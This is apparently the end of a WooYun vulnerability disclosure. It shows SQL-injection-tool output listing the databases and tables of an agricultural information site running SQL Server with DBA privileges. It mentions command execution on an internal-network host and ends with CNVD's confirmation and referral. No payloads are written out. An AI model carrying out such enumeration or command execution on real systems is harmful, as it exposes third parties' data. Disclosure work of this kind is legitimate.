| dbo.P_Category                                   | 223     |
| dbo.Gsp_MemberCategory                           | 83      |
| dbo.Friendlink                                   | 82      |
| dbo.S_Tree                                       | 53      |
| dbo.Accounts_RolePermissions                     | 49      |
| dbo.Accounts_Permissions                         | 42      |
| dbo.Gsp_ProcurementInfo                          | 16      |
| dbo.Gsp_DrugsInfo                                | 12      |
| dbo.GuestBook                                    | 12      |
| dbo.T_NewsClass                                  | 12      |
| dbo.Gsp_Administrative                           | 10      |
| dbo.Gsp_MemberInfo                               | 8       |
| dbo.Accounts_UserRoles                           | 7       |
| dbo.Accounts_Roles                               | 6       |
| dbo.Accounts_PermissionCategories                | 4       |
| dbo.Accounts_Users                               | 4       |
| dbo.Gsp_SalesInfo                                | 4       |
| dbo.MemberClass                                  | 3       |
| dbo.P_Brand                                      | 3       |
| dbo.test                                         | 3       |
| dbo.S_Log                                        | 2       |
+--------------------------------------------------+---------+
Database: Nong_20140519Bak
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.CNong_MarketPrice                            | 713140  |
| dbo.CNong_EtpPublishInfo                         | 164279  |
| dbo.CNong_ProductInfo                            | 111248  |
| dbo.CNong_ProductType                            | 37193   |
| dbo.CNong_news                                   | 24188   |
| dbo.hosturl                                      | 18764   |
| dbo.CNong_log                                    | 17512   |
| dbo.CNong_EnterPriseAccount                      | 3823    |
| dbo.CNong_EnterPriseInfo                         | 3817    |
| dbo.CNong_Question                               | 3226    |
| dbo.CNong_UserInfo                               | 2008    |
| dbo.CNong_EtpPoints                              | 1263    |
| dbo.CNong_EtpHits                                | 1184    |
| dbo.CNong_SearchKeyFX                            | 918     |
| dbo.CNong_MarketInfo                             | 496     |
| dbo.CNong_OrgInfo                                | 443     |
| dbo.ARGQACONTENT                                 | 375     |
| dbo.ARGQAONLINE                                  | 258     |
| dbo.CNong_RoleForPage                            | 190     |
| dbo.CNong_EtpPubInfoType                         | 153     |
| dbo.CNong_DepartmentInfo                         | 132     |
| dbo.CNong_Sort                                   | 113     |
| dbo.CNong_PageConfig                             | 95      |
| dbo.CNong_EtpPublishInfo_BoHui                   | 81      |
| dbo.CNong_ZiZhi                                  | 63      |
| dbo.NetInfo                                      | 51      |
| dbo.CNong_ServiceProduct                         | 50      |
| dbo.CNong_AdminUser                              | 48      |
| dbo.CNong_NewsCata                               | 46      |
| dbo.CNong_UserForRole                            | 43      |
| dbo.CNong_Video                                  | 34      |
| dbo.CNong_NewsCata2                              | 31      |
| dbo.CNong_Links                                  | 25      |
| dbo.CNong_Consumedetail                          | 17      |
| dbo.CNong_Survey_Answers                         | 16      |
| dbo.CNnong_GuanGuang                             | 14      |
| dbo.CNong_TagCata                                | 14      |
| dbo.CNong_Operation                              | 13      |
| dbo.CNong_BankInfo                               | 12      |
| dbo.CNong_Img                                    | 11      |
| dbo.CNong_MsgState                               | 11      |
| dbo.CNong_SubjectCata                            | 11      |
| dbo.CNong_Consume                                | 10      |
| dbo.CNong_Survey_options                         | 10      |
| dbo.CNong_RoleInfo                               | 9       |
| dbo.PagerConfig                                  | 9       |
| dbo.ARGQA_Type                                   | 8       |
| dbo.CNong_KeyWord                                | 8       |
| dbo.CNong_EtpGQTypeInfo                          | 6       |
| dbo.CNong_Msg                                    | 6       |
| dbo.CNong_XJ                                     | 6       |
| dbo.CNong_Survey_Log                             | 5       |
| dbo.CNong_Authenticode                           | 4       |
| dbo.CNong_EnterPriseType                         | 4       |
| dbo.CNong_MarketPrice_FluctuateTypes             | 4       |
| dbo.CNong_Survey                                 | 4       |
| dbo.CNong_JzLeave                                | 3       |
| dbo.CNong_Video_Type                             | 3       |
| dbo.CNong_PriceIndicesShowSet                    | 2       |
| dbo.CNong_EtpChargeInfo                          | 1       |
| dbo.CNong_Level                                  | 1       |
| dbo.CNong_ShoppingCart                           | 1       |
+--------------------------------------------------+---------+
Database: WUKESOFT
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.QX_SJ                                        | 182249  |
| dbo.QX_SJH                                       | 182226  |
| dbo.Tie_re                                       | 341     |
| dbo.Com_NCP                                      | 32      |
| dbo.Com_NCP_SPLB                                 | 25      |
| dbo.Art_kind                                     | 13      |
| dbo.Fl_kind                                      | 8       |
| dbo.Com_NCP_SLDW                                 | 7       |
| dbo.Tie_kind                                     | 7       |
| dbo.Pindao                                       | 6       |
| dbo.Pinglun                                      | 6       |
| dbo.Qx_Kind                                      | 6       |
| dbo.Down_kind                                    | 5       |
| dbo.Com_art                                      | 4       |
| dbo.Com_NCP_Kind                                 | 4       |
| dbo.Com_NCP_DW                                   | 3       |
| dbo.Com_fenlei                                   | 2       |
| dbo.Com_NCP_ChanDi                               | 2       |
| dbo.Com_NCP_SC                                   | 2       |
| dbo.Com_user                                     | 2       |
| dbo.Com_ad                                       | 1       |
| dbo.Com_admin                                    | 1       |
| dbo.Com_down                                     | 1       |
| dbo.Com_link                                     | 1       |
| dbo.Com_setup                                    | 1       |
| dbo.Gonggao                                      | 1       |
| dbo.Tie_main                                     | 1       |
+--------------------------------------------------+---------+
Database: NONT_TEMP
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.CNong_ProductInfo                            | 111241  |
| dbo.CNong_ProductType                            | 37186   |
| dbo.CNong_MarketPrice                            | 18879   |
| dbo.hosturl                                      | 18764   |
| dbo.CNong_news                                   | 13502   |
| dbo.CNong_Question                               | 2686    |
| dbo.CNong_log                                    | 2115    |
| dbo.CNong_EtpPoints                              | 1263    |
| dbo.CNong_EtpHits                                | 1184    |
| dbo.CNong_SearchKeyFX                            | 918     |
| dbo.CNong_EtpPublishInfo                         | 607     |
| dbo.CNong_MarketInfo                             | 496     |
| dbo.CNong_OrgInfo                                | 443     |
| dbo.CNong_RoleForPage                            | 199     |
| dbo.CNong_EtpPubInfoType                         | 153     |
| dbo.ARGQACONTENT                                 | 109     |
| dbo.CNong_DepartmentInfo                         | 96      |
| dbo.CNong_PageConfig                             | 92      |
| dbo.CNong_ZiZhi                                  | 63      |
| dbo.CNong_NewsCata                               | 53      |
| dbo.NetInfo                                      | 51      |
| dbo.CNong_ServiceProduct                         | 50      |
| dbo.CNong_Sort                                   | 42      |
| dbo.CNong_AdminUser                              | 40      |
| dbo.CNong_NewsCata2                              | 31      |
| dbo.CNong_UserForRole                            | 30      |
| dbo.CNong_Links                                  | 25      |
| dbo.ARGQAONLINE                                  | 20      |
| dbo.CNong_UserInfo                               | 18      |
| dbo.CNong_Consumedetail                          | 17      |
| dbo.CNong_Survey_Answers                         | 16      |
| dbo.CNong_TagCata                                | 14      |
| dbo.CNong_EnterPriseAccount                      | 13      |
| dbo.CNong_Operation                              | 13      |
| dbo.CNong_BankInfo                               | 12      |
| dbo.CNong_MsgState                               | 11      |
| dbo.CNong_Consume                                | 10      |
| dbo.CNong_RoleInfo                               | 10      |
| dbo.CNong_KeyWord                                | 9       |
| dbo.CNong_SubjectCata                            | 9       |
| dbo.PagerConfig                                  | 9       |
| dbo.ARGQA_Type                                   | 8       |
| dbo.CNong_Img                                    | 8       |
| dbo.CNong_Msg                                    | 6       |
| dbo.CNong_XJ                                     | 6       |
| dbo.CNong_EnterPriseInfo                         | 5       |
| dbo.CNong_Survey_Log                             | 5       |
| dbo.CNong_EnterPriseType                         | 4       |
| dbo.CNong_EtpGQTypeInfo                          | 4       |
| dbo.CNong_JzLeave                                | 3       |
| dbo.CNong_Survey                                 | 3       |
| dbo.CNong_Video                                  | 3       |
| dbo.CNong_MarketPrice_FluctuateTypes             | 2       |
| dbo.CNong_PriceIndicesShowSet                    | 2       |
| dbo.CNong_Survey_options                         | 2       |
| dbo.CNong_EtpChargeInfo                          | 1       |
| dbo.CNong_Level                                  | 1       |
| dbo.CNong_ShoppingCart                           | 1       |
+--------------------------------------------------+---------+
Database: sitegroup
+--------------------------------------------------+---------+
| Table                                            | Entries |
+--------------------------------------------------+---------+
| dbo.T_News                                       | 102     |
| dbo.S_Tree                                       | 51      |
| dbo.Accounts_RolePermissions                     | 48      |
| dbo.P_Product                                    | 44      |
| dbo.Accounts_Permissions                         | 42      |
| dbo.Gsp_MemberInfo                               | 19      |
| dbo.Gsp_ProcurementInfo                          | 16      |
| dbo.Gsp_DrugsInfo                                | 12      |
| dbo.GuestBook                                    | 12      |
| dbo.T_NewsClass                                  | 12      |
| dbo.Gsp_Administrative                           | 10      |
| dbo.Accounts_UserRoles                           | 7       |
| dbo.Accounts_Roles                               | 6       |
| dbo.P_Category                                   | 5       |
| dbo.Accounts_PermissionCategories                | 4       |
| dbo.Accounts_Users                               | 4       |
| dbo.Friendlink                                   | 4       |
| dbo.Gsp_SalesInfo                                | 4       |
| dbo.MemberClass                                  | 3       |
| dbo.P_Brand                                      | 3       |
| dbo.test                                         | 3       |
| dbo.S_Log                                        | 2       |
+--------------------------------------------------+---------+
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
current user is DBA:    True

漏洞证明:

我们也看看数据量比较大的表的字段

1.png


1.png


1.png


1.png


执行下命令

1.png


还是内网

1.png


漫游内网我可不会

修复方案:

版权声明:转载请注明来源 Yang@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-04-15 13:28

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给陕西分中心,由陕西分中心后续协调网站管理单位处置。

最新状态:

暂无